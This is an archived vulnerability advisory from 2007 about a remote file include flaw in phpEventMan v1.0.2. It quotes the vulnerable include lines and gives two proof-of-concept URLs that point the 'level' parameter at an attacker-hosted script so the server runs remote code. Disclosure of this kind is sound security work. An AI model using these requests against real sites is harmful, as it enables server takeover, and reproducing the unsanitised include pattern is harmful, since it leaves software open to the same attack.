Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15947
HistoryFeb 01, 2007 - 12:00 a.m.

phpEventMan v1.0.2 (level) Remote File Include Exploit

2007-02-0100:00:00
vulners.com
28

phpEventMan v1.0.2 (level) Remote File Include Exploit


Author: Cyber-Security

cyber-security.org


Code:

include_once($level."UserMan/controller/common.function.php");
include_once($level."Shared/sharedfunctions.php");


POC:

www.target.com/script_pat/Shared/controller/text.ctrl.php?level=http://evilscripts ?
www.target.com/script_pat/UserMan/controller/common.function.php?level=http://evilscripts ?


download: http://sourceforge.net/project/showfiles.php?group_id=169887

Reference: http://www.cyber-security.org/DataDetayAll.asp?Data_id=594